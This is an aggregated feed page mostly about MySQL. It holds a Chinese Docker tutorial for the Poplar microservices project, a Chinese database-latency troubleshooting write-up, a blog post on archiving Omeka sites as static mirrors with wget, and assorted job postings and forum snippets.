如果以上步骤都已做完,一个完整的微服务架构基本已搭建完成,可以开始coding业务代码了,为什么还要再做Docker化改造?首先随着业务的复杂度增高,可能会引入新的微服务模块,在开发新模块的同时提供一个稳定的外围环境还是很有必要的,如果测试环境不理想,可以自己启动必要的docker容器,节省编译时间;另外减少环境迁移带来的程序运行稳定性问题,便于测试、部署,为持续集成提供更便捷、高效的部署方式。

在poplar根目录执行build.sh可实现poplar包含的所有微服务模块的Docker化和一键启动:

cd poplar && ./build.sh

如果你有耐心,可看下如下两个小章节,是如何实现的

5.1 构建镜像

Poplar采用了将各微服务与数据库、注册中心单独Docker化的部署模式,其中poplar-dubbo-admin是dubbo管理控制台,poplar-apipoplar-tag-servicepoplar-action-servicepoplar-feed-servicepoplar-user-service是具体的服务化业务层模块,poplar-redispoplar-mysql提供缓存与持久化数据支持,poplar-zookeeper为Zookeeper注册中心

poplar-dubbo-admin
poplar-api
poplar-tag-service
poplar-action-service
poplar-feed-service
poplar-user-service
poplar-redis
poplar-mysql
poplar-zookeeper

poplar-apipoplar-tag-servicepoplar-action-servicepoplar-feed-servicepoplar-user-service业务层模块可以在pom.xml中配置docker-maven-plugin插件构建,在configuration中指定工作目录、基础镜像等信息可省去Dockerfile:

<plugin>
    <groupId>com.spotify</groupId>
    <artifactId>docker-maven-plugin</artifactId>
    <version>1.0.0</version>
    <configuration>
        <imageName>lvwangbeta/poplar</imageName>
        <baseImage>java</baseImage>
        <maintainer>lvwangbeta lvwangbeta@163.com</maintainer>
        <workdir>/poplardir</workdir>
        <cmd>["java", "-version"]</cmd>
        <entryPoint>["java", "-jar", "${project.build.finalName}.jar"]</entryPoint>
        <skipDockerBuild>false</skipDockerBuild>
        <resources>
            <resource>
                <targetPath>/poplardir</targetPath>
                <directory>${project.build.directory}</directory>
                <include>${project.build.finalName}.jar</include>
            </resource>
        </resources>
    </configuration>
</plugin>

如果想让某个子项目不执行docker构建,可设置子项目pom.xml的skipDockerBuild为true,如poplar-common为公共依赖包,不需要单独打包成独立镜像:

<skipDockerBuild>true</skipDockerBuild>

在poplar项目根目录执行如下命令,完成整个项目的业务层构建:

mvn package -Pdocker  -Dmaven.test.skip=true docker:build
[INFO] Building image lvwangbeta/poplar-user-service
Step 1/6 : FROM java
 ---> d23bdf5b1b1b
Step 2/6 : MAINTAINER lvwangbeta lvwangbeta@163.com
 ---> Running in b7af524b49fb
 ---> 58796b8e728d
Removing intermediate container b7af524b49fb
Step 3/6 : WORKDIR /poplardir
 ---> e7b04b310ab4
Removing intermediate container 2206d7c78f6b
Step 4/6 : ADD /poplardir/poplar-user-service-2.0.0.jar /poplardir/
 ---> 254f7eca9e94
Step 5/6 : ENTRYPOINT java -jar poplar-user-service-2.0.0.jar
 ---> Running in f933f1f8f3b6
 ---> ce512833c792
Removing intermediate container f933f1f8f3b6
Step 6/6 : CMD java -version
 ---> Running in 31f52e7e31dd
 ---> f6587d37eb4d
Removing intermediate container 31f52e7e31dd
ProgressMessage{id=null, status=null, stream=null, error=null, progress=null, progressDetail=null}
Successfully built f6587d37eb4d
Successfully tagged lvwangbeta/poplar-user-service:latest
[INFO] Built lvwangbeta/poplar-user-service
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------

5.2 启动运行容器

由于poplar包含的容器过多,在此为其创建自定义网络poplar-netwotk

docker network create --subnet=172.18.0.0/16 poplar-network

运行以上构建的镜像的容器,同时为其分配同网段IP

启动Zookeeper注册中心

docker run --name poplar-zookeeper --restart always -d  --net poplar-network --ip 172.18.0.6  zookeeper 

启动MySQL

docker run --net poplar-network --ip 172.18.0.8  --name poplar-mysql -p 3307:3306 -e MYSQL_ROOT_PASSWORD=123456 -d  lvwangbeta/poplar-mysql

启动Redis

docker run --net poplar-network --ip 172.18.0.9 --name poplar-redis -p 6380:6379 -d redis

启动业务服务

docker run --net poplar-network --ip 172.18.0.2 --name=poplar-user-service -p 8082:8082 -t lvwangbeta/poplar-user-service

docker run --net poplar-network --ip 172.18.0.3 --name=poplar-feed-service -p 8083:8083 -t lvwangbeta/poplar-feed-service

docker run --net poplar-network --ip 172.18.0.4 --name=poplar-action-service -p 8084:8084 -t lvwangbeta/poplar-action-service

docker run --net poplar-network --ip 172.18.0.10 --name=poplar-api -p 8080:8080 -t lvwangbeta/poplar-api

dockerps

至此,poplar项目的后端已完整的构建和启动,对外提供服务,客户端(无论是Web还是App)看到只有一个统一的API。


          服务端性能优化:Troubleshooting 两则      Cache   Translate Page   Web Page Cache   

这篇文章的内容是两年前的两个多IDC高延迟的Troubleshooting,经过仔细的分析和定位,最终解决,并对线上业务起到了很好的优化效果。分享给大家,共同交流学习。

最近在梳理某项目上各服务接口的性能情况,遇到两个问题。以下是定位和解决问题的一个思路,分享给大家。

业务之前并没有详细的性能日志记录,仅在电信机房(T机房)进行了性能测试,结果是各接口满足预期,服务上线。

在进一步对接口进行性能分析时,对各业务接口的关键路径添加了日志统计,通过日志进行分析,将接口的延迟进行统计,接入Grafana,观察数据后,发现两类问题。

  1. 连接MongoDB的服务,网通机房(C机房)延迟比电信机房(T机房)要高。

  2. 连接Mysql的服务,网通机房(C机房)延迟比电信机房(T机房)高。

    NOTE: 这些服务接口,都是只读,没有写操作。

    对两类问题分别进行排查:

MongoDB

简单的排查后发现,MongoDB实例有过一次迁移,并且迁移后只保留了电信机房(T机房)的实例,网通机房(C机房)没有从库,所以网通机房(C机房)延迟比电信机房(T机房)高。对网通机房(C机房)部署了从库实例后,却意外发现电信机房(T机房)的延迟比网通机房(C机房)高了。再次排查后发现,代码中配置的MongoDB的读策略是secondary(从库优先),所以网通机房(C机房)有从库后,电信机房(T机房)也去网通机房(C机房)读取,导致了电信机房(T机房)的延迟变高。更改读策略为nearest(就近优先),有所好转,但并没有预想的效果那么好。仔细看下官方文档

The driver reads from a random member of the set that has a ping time that is less than 15ms slower than the member with the lowest ping time. Reads in the MongoClient::RP_NEAREST mode do not consider the member’s type and may read from both primaries and secondaries.

就会发现,nearest是在客户端维护一个到各个实例延迟小于15ms的集合,而我们电信机房(T机房)到网通机房(C机房)是光纤直连,延迟在12ms左右,所以,每次客户端可能会连接到电信机房(T机房),也可能到网通机房(C机房)。

这点在以后的应用中,大家可以注意下。

Mysql

在所有的服务中,只有一个服务接口是读mysql实现的,而这个接口的表现更是奇怪,网通机房(C机房)的延迟比电信机房(T机房)多100 ms+。

image

开始时猜测有可能业务内做了某些写主库的操作,比如写mysql,或写redis之类的,跨机房写导致的延迟高。

实际分析后发现,业务内并没有写操作,多出的时间就是读mysql的时间。

mysql是有网通机房(C机房)的从库的,为什么读取从库的数据,延迟还会这么高呢。在我们服务端ping 网通机房(C机房)的mysql ip,发现延迟正常,只有零点几毫秒,不存在网络问题。

下一步就是通过抓包,分析下我们服务端跟mysql间到底有哪些交互,到底是哪个环节慢了。

image

根据抓包结果发现,正常的select查表请求很快能得到响应,但当从我们服务端发送一个 “Describe tableName”的请求到mysql 服务端时,服务端等待了较长时间(30ms+)才返回结果,而且一次接口服务请求中,有多次Describe的请求,这样,导致网通机房(C机房)最终延迟很高。

问题定位后,开始尝试解决。

解决问题前需要先理清思路:

  1. DescribeTableName这个命令是干什么用的,业务里并没有显式调用。这个请求能不能去掉。

  2. 如果不能去掉,那它的延迟为什么这么高,能不能优化?

第一个问题比较简单,Describe 命令是现在ORM中比较通用的做法,通过获取数据库的表结构,来动态的创建Model。如果不调用Describe命令,当然也可以做到,那样就需要自己业务端对每个model进行声明,这样开发成本会大大增加,这个方式不可取。所以需要保留Describe命令。

第二个问题,延迟为什么高,这个命令是很简单的一个命令,没有任何复杂的操作,而且主库上都没有这个问题。结合DBA同学在Mysql上使用了Atlas中间件,可以大胆猜想下,应该是这个中间件搞的鬼,把select请求分配到从库执行,但是把Describe分配到了主库执行,有可能是因为Atlas中间件只考虑了一些读的SQL,把这类请求分配到从库,而其它各种请求,可能由于过于复杂,就默认分配到主库去执行。当然这只是猜测,没有查看过Atlas的源码,所以不能妄下结论。结合已经整理到的线索,跟DBA同学进行了确认,确定 Describe命令确实被Atlas中间件发送到主库去执行了,至于这么做的原因,是为了避免主从结构不一致时,从库拿到的表结构错误。这种情况下,我们也不能评价说中间件做的到底合理不合理,所以我们需要从自己的角度再思考下能不能优化。如果说希望避免每次请求都执行Describe命令,除了说刚才提到的自己声明,另外一个方式就是cache了,因为表结构变化的频次太低了,我们完全可以设置一个较长时间的cache,来避免频繁的这种请求。业务使用的是Phalcon框架,这个框架中已经提供了这种meta-Data cache的方案,Yii中也有类似的实现: schemaCaching。

当启用这种cache后,效果就很明显,可以看到:

image

网通机房(C机房)延迟从原来的120ms降到7ms, 电信机房(T机房)延迟从原来的10ms降低到5ms.

后续需要考虑的就是,如果表结构发生变化,如何在不影响业务的情况下进行更新。这个也可以有多种实现的方案,大家可以自己想下。

总结

解决问题的思路就在于,遵循最小化原则,先对可能产生这种问题原因进行大胆猜测,然后快速验证,逐步缩小范围,将问题定位到一个最小可复现的范围内,再深入分析具体原因。当然这一切都要有数据说话,如果平时开发中,能提供足够丰富的日志数据,就可以很快的定位问题,甚至提前发现问题。

最后插个广告,猜猜我画的是啥?

image


          codeigniter bid table design      Cache   Translate Page   Web Page Cache   
codeigniter bid table design Help me to change the design of the bid page. Thanks. (Budget: $2 - $8 USD, Jobs: Codeigniter, HTML, MySQL, PHP, Website Design)
          Software Developer - SkipTheDishes - Saskatoon, SK      Cache   Translate Page   Web Page Cache   
Experience with Java 8, Python, React or MySQL is an asset. Apply your understanding of software architecture, and cutting-edge tools and technology to maintain...
From SkipTheDishes - Sat, 23 Jun 2018 06:14:46 GMT - View all Saskatoon, SK jobs
          Senior Cloud engineer      Cache   Translate Page   Web Page Cache   
Senior Cloud engineer - Altele

Senior Cloud engineer

Task/Responsibilities

As part of our modernization strategy, you will take an active participation in the design of two new applications eventually deployed into the Microsoft Azure cloud; a reference data management system and a digitization platform primarily used for document data extraction and access through APIs. As such, you will be a key actor in charge of designing and integrating those applications with the current on premise IT landscape. Your assignments will include:
Designing and documenting the cloud architecture, ensuring non-functional requirements and alignment with IT security guidelines
Developing and executing practical use cases to validate the proposed design and technology, eg high availability, performance, crash recovery
Defining and documenting new standards relevant to the development and deployment of cloud applications
Assessing and optimizing the cost of using Microsoft Azure
Upskilling of the teams involved in the design, development, provisioning and operation of cloud applications
Qualifications/required skills - Master's Degree (or equivalent) in a computer-based discipline
Good communication skills with the ability to justify and challenge architecture decisions
Hands-on experience in architecting Microsoft Azure native applications
Hands-on experience in Microsoft Azure infrastructure services (IaaS). Concrete experience in migrating on premise applications to Microsoft Azure is an asset
Experience with Serverless, Microservices and REST architecture styles
Experience in application security design, incl. identity and access management together with encryption and key management
Experience in regulatory requirements and concerns is an asset, eg risk assessment, exit strategy, data protection
Practical experience in the following technology:
o Linux OS, preferably RedHat Linux
o Java/J2EE, preferably RedHat EAP. Knowledge in Go, Spring Boot, Angular and/or React is an asset
o Messaging Middleware, preferably RedHat A-MQ
o RDBMS, preferably Oracle and MySQL
o Identity Management, preferably OpenAM
o Jenkins, Docker and Ansible
o Version Control System, preferably Git
o Repository manager, preferably Artifactory
o Apache Maven or Apache Ant
- Proficiency in written and spoken English; French and German language skills is an asset

    Companie: SKILLFINDER INTERNATIONAL
    Tipul locului de muncă: Alte

          Ed Summers: Omeka Staticify (👜🕸)      Cache   Translate Page   Web Page Cache   

If you have some old Omeka sites that are still valuable resources, but are no longer being actively maintained, you might want to consider converting them to a static site along with the PHP code and database. This means that the site can stay online in much the form that it’s in now, at the same URLs, and you still have the code and database to bring it back if you want to. From a maintenance perspective this is a big win since you no longer have the problem of keeping the PHP, Omeka and MySQL code up to date and backed up. The big trade off is that the site becomes truly static. Making any changes across the static assets would be quite tedious. So only consider this if you really anticipate that the project is no longer being actively curated.

I have done this a few times with many Wordpress sites, but Omeka is a little bit different in a few ways so I thought it was worth a quick blog post to jot down some steps.

Disable Search

This is kind of important for usability. Since there will no longer be any server side PHP code and database for it to query, there’s unfortunately no way to have a search form on your Omeka site. This may be a deal break for you, depending on how you are using the search. The good news however is that people can still find your site via Google, DuckDuckGo, or some other search engine.

To disable search take a look in your Omeka theme, often in common/header.php and simply comment out the code that generates the search form:

It might be nice to be able to generate a static Lunr.js index for your database and drop it into your Omeka site before creating the static version. This an approach that the minimal computing project Wax has taken, and should work well for average size collections. Or perhaps you could configure a Google Custom Search Engine, and similarly drop that into your Omeka before conversion. But it may be easiest to simply accept that some functionality will be lost as part of the archiving process.

Localize External Resources

It’s fairly common to use JavaScript and CSS files from various CDNs. To find them iew the source of one of your Omeka pages and scan for http to review the types of JavaScript and CSS files that might be needed for the pages to work properly. If you find any try downloading them into your theme and then updating your theme to reference them there.

Use Slash URLs

This one is kind of esoteric, but could be important. Most Omeka installs don’t use trailing slashes on URLs, for example:

https://archive.blackgothamarchive.org/items
https://archive.blackgothamarchive.org/items/show/121

The problem with this is that when you use a tool like wget to mirror a website it will download those pages using a .html extension:

archive.blackgothamarchive.org/items/show/121.html
archive.blackgothamarchive.org/items.html

This works just fine when you mount it on the web, but if anyone has linked to https://archive.blackgothamarchive.org/items/show/121 they will get a 404 Not Found.

One way around this is to convert your application URLs to end in a slash prior to creating your mirror. You can do this by modifying the url function which can be found in libraries/globals.php or in application/helpers/Url.php in older versions of Omeka. This issue ticket has some more details.

Then your URLs will look like this:

https://archive.blackgothamarchive.org/items/
https://archive.blackgothamarchive.org/items/show/121/

and will be saved by wget as:

archive.blackgothamarchive.org/items/index.html
archive.blackgothamarchive.org/items/show/121/index.html

Then when someone comes asking for an old link like:

https://archive.blackgothamarchive.org/items/show/121

Apache will happily redirect them to:

https://archive.blackgothamarchive.org/items/show/121/

and serve up the index.html that’s there. Whew. Yeah, all that for a for a forward slash. But if links are important to you it might be worth the code spelunking to get it working.

Do the Crawl

I’ve used wget for this in the past. It’s a venerable tool, that has been battle hardened over the years. It won’t execute JavaScript in your pages, but most Omeka applications don’t rely too heavily on that – it could be a problem if you use this approach to archive other types of sites.

The one problem with wget is it has many, many options, many of which interact in weird ways. Here’s an example wget command I use:

wget \
  --output-file $log \
  --warc-file $name \
  --mirror \
  --page-requisites \
  --html-extension \
  --convert-links \
  --wait 1 \
  --execute robots=off \
  --no-parent $url 2>/dev/null

This is painful so I’ve developed a little helper utility I call bagweb so I don’t need to remember the options and what they do every time I want to mirror a website. The –warc-file option will also create a WARC file as it goes if you tell it too, which can be useful, as we’ll see in a second. You run bagweb giving it a URL and a name to use for a new directory that will contain a BagIt package:

% bagweb https://archive.blackgothamarchive.org bga

This will run for a while writing a log to bga.log. Once it’s done you’ll see a directory structure like this:

% tree bga
bga
├── bag-info.txt
├── bagit.txt
├── data
│   ├── bga.warc.gz
│   └── archive.blackgothamarchive.org.tar.gz
├── manifest-md5.txt
└── tagmanifest-md5.txt

You can zip up that directory or copy it to an archive. But before we do that let’s test them.

Test!

You can unpack your mirrored website and make sure they work properly using [Docker] to easily start up an Apache instance:

tar xvfz bga/data/archive.blackgothamarchive.org.tar.gz
cd archive.blackgothamarchive.org
docker run -v `pwd`:/usr/local/apache2/htdocs -p 8080:80 httpd

And then turn off your Internet connection (wi-fi, ethernet, whatevs) and visit this URL in your browser:

http://localhost:8080/

You should see your Omeka site! For extra points you can download Webrecorder Player and open the generated WARC file and interact with it that way.

Install

Now that you have your static version of the website you need to move it up to your production web server. That should be as simple as copying the tarball up to a <DocumentRoot> configuration.

You may also want to create a tarball of the Omeka server side code and a MySQL dump of the Omeka database to save in your bag. It’s probably worth noting some details about external dependencies in the bag-info.txt such as the version of Apache, PHP, MySQL and the operating system type/version for anyone courageous enough to try to get the code running again in the future.

So, hardly a walk in the park. But if the Omeka environment is at risk for whatever reason this is a pretty satisfying process that ensures that the data is preserved, and still available on the web for people to use.


          Frontend Developer - Mayfair - Evolution Recruitment Solutions - Mayfair, SK      Cache   Translate Page   Web Page Cache   
PHP, MySQL, any backend frameworks. Exposure to design tools (Photoshop, XD and other Adobe products). Frontend Developer - Mayfair - £40-£55k DOE....
From Evolution Recruitment Solutions - Thu, 17 May 2018 21:11:30 GMT - View all Mayfair, SK jobs
          Analyst programmer web - Maisons Laprise - Montmagny, QC      Cache   Translate Page   Web Page Cache   
SQL, PHP, mySQL, Système CMS Drupal, JQuery, configuration de serveurs Linux, développement mobile (Android, iOS), expérience en développement de site...
From Maisons Laprise - Fri, 06 Apr 2018 09:23:46 GMT - View all Montmagny, QC jobs
          Programmeur - Maisons Laprise - Montmagny, QC      Cache   Translate Page   Web Page Cache   
SQL, PHP, mySQL, Système CMS Drupal, JQuery, configuration de serveurs Linux, développement mobile (Android, iOS), expérience en développement de site...
From Maisons Laprise - Thu, 05 Apr 2018 07:36:23 GMT - View all Montmagny, QC jobs
          Software Development Manager      Cache   Translate Page   Web Page Cache   
e-Merge IT Recruitment - Johannesburg, Gauteng - to work within a forward thinking, innovative and fast growing environment. If you are a Software Development Manager with skills in PHP, MySQL...
          Comment on Order By with Group By in MySQL by Avinash      Cache   Translate Page   Web Page Cache   
Can you show what you have tried?
          Comment on Order By with Group By in MySQL by Z Thakker      Cache   Translate Page   Web Page Cache   
Well that's not worked for me
          Comment on Loops in MySQL Stored Procedure by Zsolt Perkó      Cache   Translate Page   Web Page Cache   
In the WHILE section, this sentence "This is reverse of the WHILE loop", I think, correctly is "This is reverse of the REPEAT loop". By the way, this is good and compact description.
          Senior Mobile Developer - REACT - MatchBox Consulting Group - Burnaby, BC      Cache   Translate Page   Web Page Cache   
.net core/Java for middleware, MS SQL/MySQL RDS. MatchBox Consulting Group is currently searching for a Senior Developer - REACT to be part of a SCRUM team and... $95,000 a year
From MatchBox Consulting Group - Fri, 22 Jun 2018 08:15:00 GMT - View all Burnaby, BC jobs
          Sr Software Developer (Mobile App - Reactive) (7491258) - emergiTEL Inc. - Burnaby, BC      Cache   Translate Page   Web Page Cache   
.net core/Java for middleware, MS SQL/MySQL RDS. Leads design, development and documentation of a complex and comprehensive product suite.... $80,000 - $100,000 a year
From EmergiTel Inc. - Wed, 20 Jun 2018 06:49:20 GMT - View all Burnaby, BC jobs
          Software Developer Analyst - Evo Car Share Mobile App Developer - British Columbia Automobile Association - Burnaby, BC      Cache   Translate Page   Web Page Cache   
.net core/Java for middleware, MS SQL/MySQL RDS. Aon Hewitt has announced BCAA as a 2018 Canadian Gold Level Best Employer....
From British Columbia Automobile Association - Sun, 25 Mar 2018 05:46:19 GMT - View all Burnaby, BC jobs
          Senior Software Developer Analyst Evo Car Share Mobile App Developer - British Columbia Automobile Association - Burnaby, BC      Cache   Translate Page   Web Page Cache   
.net core/Java for middleware, MS SQL/MySQL RDS. Aon Hewitt has announced BCAA as a 2018 Canadian Gold Level Best Employer....
From British Columbia Automobile Association - Sun, 25 Mar 2018 05:46:18 GMT - View all Burnaby, BC jobs
          DrupalCI: Environments: MySQL 5.7 environment      Cache   Translate Page   Web Page Cache   

Problem/Motivation

Needed for test coverage for #2616488: [meta] MySQL 5.7 / MariaDb 10.1.* support.

Proposed resolution

Remaining tasks

User interface changes

API changes

Data model changes


          Connect To Mysql Database Use Select Insert      Cache   Translate Page   Web Page Cache   
connect to mysql database use select insert
          Fix Joomla website (offline)      Cache   Translate Page   Web Page Cache   
Our Joomla website has been disabled and needs fixing. Here is a message from our web host explaining the issue: Looking at the server logs, I see that your website was disabled because the contact form on it was being exploited to send spam... (Budget: $30 - $250 USD, Jobs: CSS, HTML, Joomla, MySQL, PHP)
          Add Payment Method To Website      Cache   Translate Page   Web Page Cache   
Looking for Experienced Front End Developer with at least 3-6 months experience on Web Development & Adding PayPal Payment Method Gateway to Website. For additional details contact in PM. Thank You (Budget: $10 - $30 USD, Jobs: HTML, Javascript, MySQL, PHP, Website Design)
          Introduction to database joins with mariadb and mysql join examples      Cache   Translate Page   Web Page Cache   

LinuxConfig: In this tutorial we will see the different type of joins available when using MySQL or MariaDB.


          Need Laravel developer with HTML/CSS experience to implement features for existing site      Cache   Translate Page   Web Page Cache   
We are seeking a Web Application Developer that will help develop and test new features for our existing web based application (Laravel 5.5). This is an on-going project (3-6 months, maybe more) implementing... (Budget: $750 - $1500 USD, Jobs: HTML, Laravel, MySQL, PHP, Website Design)
          Build an Android Image Dealing APP      Cache   Translate Page   Web Page Cache   
1This is an image Android APP(React/MySQL) 2 User Management: Signup/Login/Forget Password(support FB/INS/Mobile/Email account login) 3 Image: upload/show/catalog(by Type)/mosaic(not difficult just put... (Budget: $250 - $750 NZD, Jobs: Android, Mobile App Development, MySQL, Software Architecture)
          delta web      Cache   Translate Page   Web Page Cache   
I need my website re-configured.I need you to design and build my personal website. (Budget: $30 - $250 USD, Jobs: MySQL, PHP, Shopify, System Admin, WordPress)
          Analista / programador freelance      Cache   Translate Page   Web Page Cache   
Desarrollo, asesoría de programas y/o sistemas. visual net, c++, java, php. sql server, mysql. programacion avanzada en excel y access
          Uniface Developer - Oscar Technology - Rossendale      Cache   Translate Page   Web Page Cache   
Uniface Developer - Uniface - MySQL - Rossendale. Two Uniface Developers are required for a 6 month initial contract with my client....
From Oscar Technology - Thu, 05 Jul 2018 16:55:05 GMT - View all Rossendale jobs
          Cryptocurrency Exchange, Blockchain developer - Upwork      Cache   Translate Page   Web Page Cache   
We are looking for an experience developers to develop cryptocurrency exchange and platform.

The developer will have previous experience creating wallets for bitcoin and altcoins.

Our platform is expected to operate as p2p an p2c

Just have in mind creating a binance with more flexible features and functions.


Posted On: July 11, 2018 04:12 UTC
Category: Web, Mobile & Software Dev > Web Development
Skills: AngularJS, CSS, CSS3, HTML, HTML5, JavaScript, jQuery, MySQL Administration, PHP, Web Design, Website Development
Country: Nigeria
click to apply
          mysql error in query in sp      Cache   Translate Page   Web Page Cache   

Hi All

i am useing Sp in Mysql below is my sp

////////// below is my code

CREATE DEFINER=`root`@`localhost` PROCEDURE `sp_newemp21`

<div>(</div> <div>in empid int,</div> <div>in empname varchar(500),</div> <div> </div> <div>in empaddress varchar(500),</div> <div> </div> <div>in emplocation varchar(500))</div>

<div>BEGIN</div> <div> </div> <div>if (empid is  null)</div> <div> </div> <div>then</div> <div> INSERT INTO  newemp21(empname,empaddress,emplocation)</div> <div> VALUES(empname,empaddress,emplocation);</div> <div> </div> <div> </div> <div>else </div> <div></div> <div>update newemp21 set empname=empname, empaddress=empaddress, emplocation=emplocation where empid=empid;</div> <div> </div> <div>END IF;</div> <div> </div> <div> </div> <div>End</div>

CREATE TABLE `newemp21` (
`empid` int(11) NOT NULL AUTO_INCREMENT,
`empname` varchar(500) DEFAULT NULL,
`empaddress` varchar(500) DEFAULT NULL,
`emplocation` varchar(500) DEFAULT NULL,
PRIMARY KEY (`empid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;


          Software Developer - SkipTheDishes - Winnipeg, MB      Cache   Translate Page   Web Page Cache   
Experience with Java 8, Python, React or MySQL is an asset. Apply your understanding of software architecture, and cutting-edge tools and technology to maintain...
From SkipTheDishes - Sat, 23 Jun 2018 06:14:49 GMT - View all Winnipeg, MB jobs
          Java JEE Developer      Cache   Translate Page   Web Page Cache   
VA-Reston, Java Developer Reston, VA MUST: Experienced Mid level Java Developer 5 years of experience in software/web services design or related area Knowledge of Java, Java services and frameworks such as Spring, JSP (Java Server Pages), and JSF (Java Server Faces) Should have knowledge of Web Services; SOAP, XML, J2EE (Java Enterprise Edition) Some knowledge of MySQL and Linux and knowledge of web language
          Pengajar Freelance Web Programming FLASHCOM INDONESIA, Surabaya      Cache   Translate Page   Web Page Cache   

Job description: Mengajar sesuai kebutuhan siswa dengan jadwal yang fleksibel Tanggung Jawab Pekerjaan : Mengajar sesuai kebutuhan siswa dengan jadwal yang fleksibel Syarat Pengalaman : Pengalaman Minimal 1 Tahun Keahlian : Menguasai Software dan Hardware Kualifikasi : 1. Pria & wanita 2. Min 23 tahun 3. Mahir php programming, HTML language, dan MySQL 4. Domisili […]

Info selengkapnya Pengajar Freelance Web Programming FLASHCOM INDONESIA, Surabaya cek di www.loker.id


          (USA-OK-Oklahoma City) Full Stack Application Developer      Cache   Translate Page   Web Page Cache   
          (USA-WA-SEATTLE) Lead Software Engineer      Cache   Translate Page   Web Page Cache   
Headquartered in Seattle, Washington, Wireless Advocates is a leading provider of wireless products and services both online and in over 600 retail locations nationwide. Together with the top wireless carriers (Verizon, T-Mobile, AT&T, Sprint) and OEM's (Apple, Samsung, LG, Motorola), our knowledgeable teams of on-site wireless professionals deliver high-value products and services - helping consumers connect and communicate every day. Car Toys is the parent company of Wireless Advocates and the largest independent multi-channel specialty car audio and mobile electronics retailer in the United States. We offer a broad selection of the best car audio, mobile entertainment, navigation/road safety, and security systems from the top manufacturers and also offer an array of auto salon services. Our consultative process ensures you're getting what you need, and our certified installers and superior installation standards ensure your products will be installed flawlessly. Mission and Scope The Lead Software Engineer is a seasoned software engineer with leadership skills and extensive knowledge and experience in designing and building complex, highly scalable and dependable application systems. The candidate will interact closely with project management, business analysts, test engineers and other software engineers to shape, identify, prioritize, and realize project requirements in the delivery of business solutions. Successful candidates will have a comprehensive knowledge of web front-end and back-end development tools, technologies, practices, and standards; proven ability to integrate large scale systems or third party products; and a track record of delivering high-quality, web-based business solutions in a timely and effective manner. + Guide, mentor and lead a team of software engineers + Customize, integrate, and support vendor-supplied software to support business users + Work in DevOps agile teams primarily in .NET and Azure technology environment + Follow established coding standards and other group procedures, both individually and at a team level. Must ensure proper code reviews are held for the project and that development processes and tool utilization are followed. + Contribute to the engineering team’s culture of high code quality. Accountable for the quality of code that is delivered to QA and production; must ensure that appropriate code reviews and unit testing are adequately performed. + Ensure that continuous integration is performed on the application source code and constantly seeks to enhance the continuous integration methods of the development team to ensure extremely high quality of code. + Work closely with project management and requirements analysts to thoroughly understand the system requirements and ensure they are properly implemented. Also must seek ways to meet the underlying business requirements with low-cost, yet highly re-usable patterns and actively escalate requirements that may cause unnecessary risk or cost. + Ensure that application code adheres to enterprise and industry standards and best practices, including performance and security standards. + Work with offshore developers to implement new features + Other duties as assigned. + 8+ years of developing applications and customer-facing, ecommerce websites. + Working knowledge of the following technologies: C#.Net, SQL/Server, HTML, CSS, JavaScript, JQuery, XSLT, PHP, PowerShell, SQL queries + Experience in implementing and supporting vendor-supplied software packages + Experienced in handling managed services engagements + Experienced in gathering and analyzing user requirements + Experienced in modern UI design + Skilled and experienced in leading technical teams + Ability to understand and discuss business issues as well as technical issues + Strong written and verbal English communication skills + Self-motivated, persistent, results-oriented, enthusiastic, flexible + Ability to work with minimal supervision, independently or as a member of a team + Confidence in situations with high ambiguity and uncertainty + Have a willingness to learn + Expert-level Object Oriented knowledge, with demonstrated complex implementations a must, e.g., custom API's, optimization techniques, and design patterns. + Must have practical experience developing and public cloud concepts and protocols, in particular Azure + Experience with DevOps tools and automation + Experience working in an iterative(agile/scrum) development environment + Experience in documenting design and architecture artifacts and presenting artifacts for architectural review Pluses: + Working knowledge of the following technologies: SSIS, VB.Net, MySQL, WordPress + Experience in customizing MS Dynamics AX applications using C++ + Experience in configuring, customizing, and integrating Magento and Monsoon ecommerce platforms + Test-driven development and continuous integration experience is preferred Car Toys, Inc. / Wireless Advocates supports and encourages a diverse workplace. Any offer of employment is contingent upon an employment background check. We’ve Got You Covered At Car Toys / Wireless Advocates, LLC., our people are our greatest asset. We are dedicated to providing our employees the tools to succeed in their career, as well as to maintain a healthy work-life balance. We offer the following benefits: Medical, Dental, and Vision Healthcare Coverage 401(k) with company match Company Paid Commuter Program Paid Vacation, Sick, PTO and Holidays Requisition ID: 2018-13508 External Company URL: www.wirelessadvocates.com Street: Fairview Ave N, Suite 900 Post End Date: 8/27/2018
          EXPERIENCED AND MATURE PHP DEVELOPER NEEDED URGENTLY      Cache   Translate Page   Web Page Cache   
PLEASE READ PROPERLY. DON'T ASK STUPID QUESTIONS. READ THIS AND THEN BID! We have an open source CRM done in codeignitor PHP FRAMEWORK and it needs to be customised: The customisations needed (READ CAREFULLY): - Complete change of branding and colors... (Budget: $10 - $30 AUD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Fix my open SSL, with team viewer...(BIN Folder) its not appearing in cmd screen      Cache   Translate Page   Web Page Cache   
I need to make sure my OPEN SSL, works fine, in order to create some certificate, and keys... I installed on my computer, but its not working, some error mistakes appear on screen need to fix it..., i change value parameters, something its missing.... (Budget: $10 - $30 USD, Jobs: Linux, MySQL, PHP, Software Architecture, Web Security)
          Medical Diagnosis system using AI in Android application      Cache   Translate Page   Web Page Cache   
Implementation In our application, our major logic deals with the usage of AI in Android Application for smartphone. Whenever user opens app, user will first enter user details: 1) For First time user Registration form opens and required results stored in database... (Budget: $30 - $250 USD, Jobs: Android, Artificial Intelligence, Java, Mobile App Development, MySQL)
          Sr. Lead Linux Engineer - TekPartners, A P2P Company - Milwaukee, WI      Cache   Translate Page   Web Page Cache   
Oracle RAC Clusters. Setting up new Red Hat Linux bare-metal and virtual machines. Working understanding of Databases of Oracle, Progress, MySQL, PostgreSQL or...
From TekPartners - Wed, 27 Jun 2018 02:06:02 GMT - View all Milwaukee, WI jobs
          Software Engineer - Microsoft - Bellevue, WA      Cache   Translate Page   Web Page Cache   
Presentation, Application, Business, and Data layers) preferred. Database development experience with technologies like MS SQL, MySQL, or Oracle....
From Microsoft - Sat, 30 Jun 2018 02:19:22 GMT - View all Bellevue, WA jobs
          SR. Software Engineer - Microsoft - Bellevue, WA      Cache   Translate Page   Web Page Cache   
Presentation, Application, Business, and Data layers). 4+ years of database development experience with technologies like MS SQL, MySQL, or Oracle 4+ years of...
From Microsoft - Tue, 20 Mar 2018 17:02:08 GMT - View all Bellevue, WA jobs
          Software Engineer - Cloud - JP Morgan Chase - Seattle, WA      Cache   Translate Page   Web Page Cache   
